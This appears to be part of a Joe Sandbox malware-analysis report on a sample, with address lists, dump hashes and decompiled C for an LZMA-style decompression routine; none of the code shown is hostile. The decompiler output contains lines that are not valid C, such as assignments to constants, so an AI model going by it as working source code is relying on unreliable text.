                      0x00407399
                      0x004073bb
                      0x004073be
                      0x004073c8
                      0x004073cb
                      0x004073cb
                      0x004073cb
                      0x00000000
                      0x004073cb
                      0x004073cb
                      0x0040739b
                      0x0040739e
                      0x004073a2
                      0x004073a5
                      0x004073a5
                      0x004073a8
                      0x00000000
                      0x00000000
                      0x00407452
                      0x00407456
                      0x00407474
                      0x00407474
                      0x00407474
                      0x0040747b
                      0x00407482
                      0x00407489
                      0x00407489
                      0x00000000
                      0x00407489
                      0x00407458
                      0x0040745b
                      0x0040745e
                      0x00407461
                      0x00407468
                      0x004073ac
                      0x004073ac
                      0x004073af
                      0x00000000
                      0x00000000
                      0x00407543
                      0x00407546
                      0x00407447
                      0x00000000
                      0x00000000
                      0x0040717d
                      0x0040717f
                      0x00407186
                      0x00407187
                      0x00407189
                      0x0040718c
                      0x00000000
                      0x00000000
                      0x00407194
                      0x00407197
                      0x0040719a
                      0x0040719c
                      0x0040719e
                      0x0040719e
                      0x0040719f
                      0x004071a2
                      0x004071a9
                      0x004071ac
                      0x004071ba
                      0x00000000
                      0x00000000
                      0x00407490
                      0x00407490
                      0x00407493
                      0x0040749a
                      0x00000000
                      0x00000000
                      0x0040749f
                      0x0040749f
                      0x004074a3
                      0x004075db
                      0x00000000
                      0x004075db
                      0x004074a9
                      0x004074ac
                      0x004074af
                      0x004074b3
                      0x004074b6
                      0x004074bc
                      0x004074be
                      0x004074be
                      0x004074be
                      0x004074c1
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c4
                      0x004074c7
                      0x004074c7
                      0x004074cb
                      0x0040752b
                      0x0040752e
                      0x00407533
                      0x00407534
                      0x00407536
                      0x00407538
                      0x0040753b
                      0x00407447
                      0x00407447
                      0x00000000
                      0x0040744d
                      0x00407447
                      0x004074cd
                      0x004074d3
                      0x004074d6
                      0x004074d9
                      0x004074dc
                      0x004074df
                      0x004074e2
                      0x004074e5
                      0x004074e8
                      0x004074eb
                      0x004074ee
                      0x00407507
                      0x0040750a
                      0x0040750d
                      0x00407510
                      0x00407514
                      0x00407516
                      0x00407516
                      0x00407517
                      0x0040751a
                      0x004074f0
                      0x004074f0
                      0x004074f8
                      0x004074fd
                      0x004074ff
                      0x00407502
                      0x00407502
                      0x0040751d
                      0x00407524
                      0x00000000
                      0x00407526
                      0x00000000
                      0x00407526
                      0x00000000
                      0x004071c2
                      0x004071c5
                      0x004071fb
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732b
                      0x0040732e
                      0x0040732e
                      0x00407331
                      0x00407333
                      0x004075bd
                      0x00000000
                      0x004075bd
                      0x00407339
                      0x0040733c
                      0x00000000
                      0x00000000
                      0x00407342
                      0x00407346
                      0x00407349
                      0x00407349
                      0x00407349
                      0x00000000
                      0x00407349
                      0x004071c7
                      0x004071c9
                      0x004071cb
                      0x004071cd
                      0x004071d0
                      0x004071d1
                      0x004071d3
                      0x004071d5
                      0x004071d8
                      0x004071db
                      0x004071f1
                      0x004071f6
                      0x0040722e
                      0x0040722e
                      0x00407232
                      0x0040725e
                      0x00407260
                      0x00407267
                      0x0040726a
                      0x0040726d
                      0x0040726d
                      0x00407272
                      0x00407272
                      0x00407274
                      0x00407277
                      0x0040727e
                      0x00407281
                      0x004072ae
                      0x004072ae
                      0x004072b1
                      0x004072b4
                      0x00407328
                      0x00407328
                      0x00407328
                      0x00000000
                      0x00407328
                      0x004072b6
                      0x004072bc
                      0x004072bf
                      0x004072c2
                      0x004072c5
                      0x004072c8
                      0x004072cb
                      0x004072ce
                      0x004072d1
                      0x004072d4
                      0x004072d7
                      0x004072f0
                      0x004072f2
                      0x004072f5
                      0x004072f6
                      0x004072f9
                      0x004072fb
                      0x004072fe
                      0x00407300
                      0x00407302
                      0x00407305
                      0x00407307
                      0x0040730a
                      0x0040730e
                      0x00407310
                      0x00407310
                      0x00407311
                      0x00407314
                      0x00407317
                      0x004072d9
                      0x004072d9
                      0x004072e1
                      0x004072e6
                      0x004072e8
                      0x004072eb
                      0x004072eb
                      0x0040731a
                      0x00407321
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x004072ab
                      0x00000000
                      0x00407323
                      0x00000000
                      0x00407323
                      0x00407321
                      0x00407234
                      0x00407237
                      0x00407239
                      0x0040723c
                      0x0040723f
                      0x00407242
                      0x00407244
                      0x00407247
                      0x0040724a
                      0x0040724a
                      0x0040724d
                      0x0040724d
                      0x00407250
                      0x00407257
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x0040722b
                      0x00000000
                      0x00407259
                      0x00000000
                      0x00407259
                      0x00407257
                      0x004071dd
                      0x004071e0
                      0x004071e2
                      0x004071e5
                      0x00000000
                      0x00000000
                      0x00406f44
                      0x00406f44
                      0x00406f48
                      0x0040758d
                      0x00000000
                      0x0040758d
                      0x00406f4e
                      0x00406f51
                      0x00406f54
                      0x00406f57
                      0x00406f5a
                      0x00406f5d
                      0x00406f60
                      0x00406f62
                      0x00406f65
                      0x00406f68
                      0x00406f6b
                      0x00406f6d
                      0x00406f6d
                      0x00406f6d
                      0x00000000
                      0x00000000
                      0x004070cf
                      0x004070cf
                      0x004070d3
                      0x00407599
                      0x00000000
                      0x00407599
                      0x004070d9
                      0x004070dc
                      0x004070df
                      0x004070e2
                      0x004070e4
                      0x004070e4
                      0x004070e4
                      0x004070e7
                      0x004070ea
                      0x004070ed
                      0x004070f0
                      0x004070f3
                      0x004070f6
                      0x004070f7
                      0x004070f9
                      0x004070f9
                      0x004070f9
                      0x004070fc
                      0x004070ff
                      0x00407102
                      0x00407105
                      0x00407105
                      0x00407105
                      0x00407108
                      0x0040710a
                      0x0040710a
                      0x00000000
                      0x00000000
                      0x0040734c
                      0x0040734c
                      0x0040734c
                      0x00407350
                      0x00000000
                      0x00000000
                      0x00407356
                      0x00407359
                      0x0040735c
                      0x0040735f
                      0x00407361
                      0x00407361
                      0x00407361
                      0x00407364
                      0x00407367
                      0x0040736a
                      0x0040736d
                      0x00407370
                      0x00407373
                      0x00407374
                      0x00407376
                      0x00407376
                      0x00407376
                      0x00407379
                      0x0040737c
                      0x0040737f
                      0x00407382
                      0x00407385
                      0x00407389
                      0x0040738b
                      0x0040738e
                      0x00000000
                      0x00407390
                      0x0040710d
                      0x0040710d
                      0x00000000
                      0x0040710d
                      0x0040738e
                      0x004075c3
                      0x00000000
                      0x00000000
                      0x00406bf2
                      0x004075fa
                      0x004075fa
                      0x00000000
                      0x004075fa
                      0x00407447
                      0x004073ce
                      0x004073cb
                      0x00000000
                      0x00407120

                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                      • Instruction ID: aecab3f40db1f9fc07a3dc9ea3777efa7aa3d7dc23f88bc09ddd959c6243594a
                      • Opcode Fuzzy Hash: c68610f165bc536a6a66ce61bc987e677a2aaa57ebbfa987bd426c3fc0f92c56
                      • Instruction Fuzzy Hash: 2B711571D04228DBEF28CF98C8547ADBBB1FF44305F14806AD856BB281D778A986DF05
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E00407068() {
                      				unsigned short _t531;
                      				signed int _t532;
                      				void _t533;
                      				signed int _t534;
                      				signed int _t535;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t589;
                      				signed int* _t606;
                      				void* _t613;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t613 - 0x40) != 0) {
                      						 *(_t613 - 0x84) = 0xa;
                      						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
                      					} else {
                      						 *(__ebp - 0x84) = 9;
                      						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      					}
                      					while(1) {
                      						 *(_t613 - 0x54) = _t606;
                      						while(1) {
                      							L133:
                      							_t531 =  *_t606;
                      							_t589 = _t531 & 0x0000ffff;
                      							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      							if( *(_t613 - 0xc) >= _t565) {
                      								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      								 *(_t613 - 0x40) = 1;
                      								_t532 = _t531 - (_t531 >> 5);
                      								 *_t606 = _t532;
                      							} else {
                      								 *(_t613 - 0x10) = _t565;
                      								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      								 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      							}
                      							if( *(_t613 - 0x10) >= 0x1000000) {
                      								goto L139;
                      							}
                      							L137:
                      							if( *(_t613 - 0x6c) == 0) {
                      								 *(_t613 - 0x88) = 5;
                      								L170:
                      								_t568 = 0x22;
                      								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                      								_t535 = 0;
                      								L172:
                      								return _t535;
                      							}
                      							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                      							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      							L139:
                      							_t533 =  *(_t613 - 0x84);
                      							while(1) {
                      								 *(_t613 - 0x88) = _t533;
                      								while(1) {
                      									L1:
                      									_t534 =  *(_t613 - 0x88);
                      									if(_t534 > 0x1c) {
                      										break;
                      									}
                      									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                      										case 0:
                      											if( *(_t613 - 0x6c) == 0) {
                      												goto L170;
                      											}
                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      											_t534 =  *( *(_t613 - 0x70));
                      											if(_t534 > 0xe1) {
                      												goto L171;
                      											}
                      											_t538 = _t534 & 0x000000ff;
                      											_push(0x2d);
                      											asm("cdq");
                      											_pop(_t570);
                      											_push(9);
                      											_pop(_t571);
                      											_t609 = _t538 / _t570;
                      											_t540 = _t538 % _t570 & 0x000000ff;
                      											asm("cdq");
                      											_t604 = _t540 % _t571 & 0x000000ff;
                      											 *(_t613 - 0x3c) = _t604;
                      											 *(_t613 - 0x1c) = (1 << _t609) - 1;
                      											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                      											_t612 = (0x300 << _t604 + _t609) + 0x736;
                      											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                      												L10:
                      												if(_t612 == 0) {
                      													L12:
                      													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                      													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      													goto L15;
                      												} else {
                      													goto L11;
                      												}
                      												do {
                      													L11:
                      													_t612 = _t612 - 1;
                      													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                      												} while (_t612 != 0);
                      												goto L12;
                      											}
                      											if( *(_t613 - 4) != 0) {
                      												GlobalFree( *(_t613 - 4));
                      											}
                      											_t534 = GlobalAlloc(0x40, 0x600); // executed
                      											 *(_t613 - 4) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                      												goto L10;
                      											}
                      										case 1:
                      											L13:
                      											__eflags =  *(_t613 - 0x6c);
                      											if( *(_t613 - 0x6c) == 0) {
                      												 *(_t613 - 0x88) = 1;
                      												goto L170;
                      											}
                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                      											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                      											_t45 = _t613 - 0x48;
                      											 *_t45 =  *(_t613 - 0x48) + 1;
                      											__eflags =  *_t45;
                      											L15:
                      											if( *(_t613 - 0x48) < 4) {
                      												goto L13;
                      											}
                      											_t546 =  *(_t613 - 0x40);
                      											if(_t546 ==  *(_t613 - 0x74)) {
                      												L20:
                      												 *(_t613 - 0x48) = 5;
                      												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                      												goto L23;
                      											}
                      											 *(_t613 - 0x74) = _t546;
                      											if( *(_t613 - 8) != 0) {
                      												GlobalFree( *(_t613 - 8));
                      											}
                      											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                      											 *(_t613 - 8) = _t534;
                      											if(_t534 == 0) {
                      												goto L171;
                      											} else {
                      												goto L20;
                      											}
                      										case 2:
                      											L24:
                      											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                      											 *(_t613 - 0x84) = 6;
                      											 *(_t613 - 0x4c) = _t553;
                      											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                      											 *(_t613 - 0x54) = _t606;
                      											goto L133;
                      										case 3:
                      											L21:
                      											__eflags =  *(_t613 - 0x6c);
                      											if( *(_t613 - 0x6c) == 0) {
                      												 *(_t613 - 0x88) = 3;
                      												goto L170;
                      											}
                      											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                      											_t67 = _t613 - 0x70;
                      											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                      											__eflags =  *_t67;
                      											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                      											L23:
                      											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                      											if( *(_t613 - 0x48) != 0) {
                      												goto L21;
                      											}
                      											goto L24;
                      										case 4:
                      											L133:
                      											_t531 =  *_t606;
                      											_t589 = _t531 & 0x0000ffff;
                      											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                      											if( *(_t613 - 0xc) >= _t565) {
                      												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                      												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                      												 *(_t613 - 0x40) = 1;
                      												_t532 = _t531 - (_t531 >> 5);
                      												 *_t606 = _t532;
                      											} else {
                      												 *(_t613 - 0x10) = _t565;
                      												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                      												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                      											}
                      											if( *(_t613 - 0x10) >= 0x1000000) {
                      												goto L139;
                      											}
                      										case 5:
                      											goto L137;
                      										case 6:
                      											__edx = 0;
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x34) = 1;
                      												 *(__ebp - 0x84) = 7;
                      												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                      												while(1) {
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      											__esi =  *(__ebp - 0x60);
                      											__cl = 8;
                      											__cl = 8 -  *(__ebp - 0x3c);
                      											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      											__ecx =  *(__ebp - 0x3c);
                      											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      											__ecx =  *(__ebp - 4);
                      											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      											__eflags =  *(__ebp - 0x38) - 4;
                      											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      											if( *(__ebp - 0x38) >= 4) {
                      												__eflags =  *(__ebp - 0x38) - 0xa;
                      												if( *(__ebp - 0x38) >= 0xa) {
                      													_t98 = __ebp - 0x38;
                      													 *_t98 =  *(__ebp - 0x38) - 6;
                      													__eflags =  *_t98;
                      												} else {
                      													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      												}
                      											} else {
                      												 *(__ebp - 0x38) = 0;
                      											}
                      											__eflags =  *(__ebp - 0x34) - __edx;
                      											if( *(__ebp - 0x34) == __edx) {
                      												__ebx = 0;
                      												__ebx = 1;
                      												goto L61;
                      											} else {
                      												__eax =  *(__ebp - 0x14);
                      												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      												__eflags = __eax -  *(__ebp - 0x74);
                      												if(__eax >=  *(__ebp - 0x74)) {
                      													__eax = __eax +  *(__ebp - 0x74);
                      													__eflags = __eax;
                      												}
                      												__ecx =  *(__ebp - 8);
                      												__ebx = 0;
                      												__ebx = 1;
                      												__al =  *((intOrPtr*)(__eax + __ecx));
                      												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      												goto L41;
                      											}
                      										case 7:
                      											__eflags =  *(__ebp - 0x40) - 1;
                      											if( *(__ebp - 0x40) != 1) {
                      												__eax =  *(__ebp - 0x24);
                      												 *(__ebp - 0x80) = 0x16;
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x28);
                      												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      												__eax =  *(__ebp - 0x2c);
                      												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      												__eax = 0;
                      												__eflags =  *(__ebp - 0x38) - 7;
                      												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      												__al = __al & 0x000000fd;
                      												__eax = (__eflags >= 0) - 1 + 0xa;
                      												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      												__eax =  *(__ebp - 4);
                      												__eax =  *(__ebp - 4) + 0x664;
                      												__eflags = __eax;
                      												 *(__ebp - 0x58) = __eax;
                      												goto L69;
                      											}
                      											__eax =  *(__ebp - 4);
                      											__ecx =  *(__ebp - 0x38);
                      											 *(__ebp - 0x84) = 8;
                      											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      											while(1) {
                      												 *(_t613 - 0x54) = _t606;
                      												goto L133;
                      											}
                      										case 8:
                      											goto L0;
                      										case 9:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												goto L89;
                      											}
                      											__eflags =  *(__ebp - 0x60);
                      											if( *(__ebp - 0x60) == 0) {
                      												goto L171;
                      											}
                      											__eax = 0;
                      											__eflags =  *(__ebp - 0x38) - 7;
                      											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      											__eflags = _t258;
                      											0 | _t258 = _t258 + _t258 + 9;
                      											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      											goto L75;
                      										case 0xa:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__eax =  *(__ebp - 4);
                      												__ecx =  *(__ebp - 0x38);
                      												 *(__ebp - 0x84) = 0xb;
                      												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      												while(1) {
                      													 *(_t613 - 0x54) = _t606;
                      													goto L133;
                      												}
                      											}
                      											__eax =  *(__ebp - 0x28);
                      											goto L88;
                      										case 0xb:
                      											__eflags =  *(__ebp - 0x40);
                      											if( *(__ebp - 0x40) != 0) {
                      												__ecx =  *(__ebp - 0x24);
                      												__eax =  *(__ebp - 0x20);
                      												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      											} else {
                      												__eax =  *(__ebp - 0x24);
                      											}
                      											__ecx =  *(__ebp - 0x28);
                      											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      											L88:
                      											__ecx =  *(__ebp - 0x2c);
                      											 *(__ebp - 0x2c) = __eax;
                      											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      											L89:
                      											__eax =  *(__ebp - 4);
                      											 *(__ebp - 0x80) = 0x15;
                      											__eax =  *(__ebp - 4) + 0xa68;
                      											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                      											goto L69;
                      										case 0xc:
                      											L99:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xc;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t334 = __ebp - 0x70;
                      											 *_t334 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t334;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											__eax =  *(__ebp - 0x2c);
                      											goto L101;
                      										case 0xd:
                      											L37:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xd;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t122 = __ebp - 0x70;
                      											 *_t122 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t122;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L39:
                      											__eax =  *(__ebp - 0x40);
                      											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                      											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      												goto L48;
                      											}
                      											__eflags = __ebx - 0x100;
                      											if(__ebx >= 0x100) {
                      												goto L54;
                      											}
                      											L41:
                      											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      											__ecx =  *(__ebp - 0x58);
                      											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      											 *(__ebp - 0x48) = __eax;
                      											__eax = __eax + 1;
                      											__eax = __eax << 8;
                      											__eax = __eax + __ebx;
                      											__esi =  *(__ebp - 0x58) + __eax * 2;
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      											__ax =  *__esi;
                      											 *(__ebp - 0x54) = __esi;
                      											__edx = __ax & 0x0000ffff;
                      											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      											__eflags =  *(__ebp - 0xc) - __ecx;
                      											if( *(__ebp - 0xc) >= __ecx) {
                      												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      												__cx = __ax;
                      												 *(__ebp - 0x40) = 1;
                      												__cx = __ax >> 5;
                      												__eflags = __eax;
                      												__ebx = __ebx + __ebx + 1;
                      												 *__esi = __ax;
                      											} else {
                      												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      												 *(__ebp - 0x10) = __ecx;
                      												0x800 = 0x800 - __edx;
                      												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      												__ebx = __ebx + __ebx;
                      												 *__esi = __cx;
                      											}
                      											__eflags =  *(__ebp - 0x10) - 0x1000000;
                      											 *(__ebp - 0x44) = __ebx;
                      											if( *(__ebp - 0x10) >= 0x1000000) {
                      												goto L39;
                      											} else {
                      												goto L37;
                      											}
                      										case 0xe:
                      											L46:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t156 = __ebp - 0x70;
                      											 *_t156 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t156;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											while(1) {
                      												L48:
                      												__eflags = __ebx - 0x100;
                      												if(__ebx >= 0x100) {
                      													break;
                      												}
                      												__eax =  *(__ebp - 0x58);
                      												__edx = __ebx + __ebx;
                      												__ecx =  *(__ebp - 0x10);
                      												__esi = __edx + __eax;
                      												__ecx =  *(__ebp - 0x10) >> 0xb;
                      												__ax =  *__esi;
                      												 *(__ebp - 0x54) = __esi;
                      												__edi = __ax & 0x0000ffff;
                      												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      												__eflags =  *(__ebp - 0xc) - __ecx;
                      												if( *(__ebp - 0xc) >= __ecx) {
                      													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      													__cx = __ax;
                      													_t170 = __edx + 1; // 0x1
                      													__ebx = _t170;
                      													__cx = __ax >> 5;
                      													__eflags = __eax;
                      													 *__esi = __ax;
                      												} else {
                      													 *(__ebp - 0x10) = __ecx;
                      													0x800 = 0x800 - __edi;
                      													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      													__ebx = __ebx + __ebx;
                      													 *__esi = __cx;
                      												}
                      												__eflags =  *(__ebp - 0x10) - 0x1000000;
                      												 *(__ebp - 0x44) = __ebx;
                      												if( *(__ebp - 0x10) >= 0x1000000) {
                      													continue;
                      												} else {
                      													goto L46;
                      												}
                      											}
                      											L54:
                      											_t173 = __ebp - 0x34;
                      											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                      											__eflags =  *_t173;
                      											goto L55;
                      										case 0xf:
                      											L58:
                      											__eflags =  *(__ebp - 0x6c);
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xf;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t203 = __ebp - 0x70;
                      											 *_t203 =  *(__ebp - 0x70) + 1;
                      											__eflags =  *_t203;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											L60:
                      											__eflags = __ebx - 0x100;
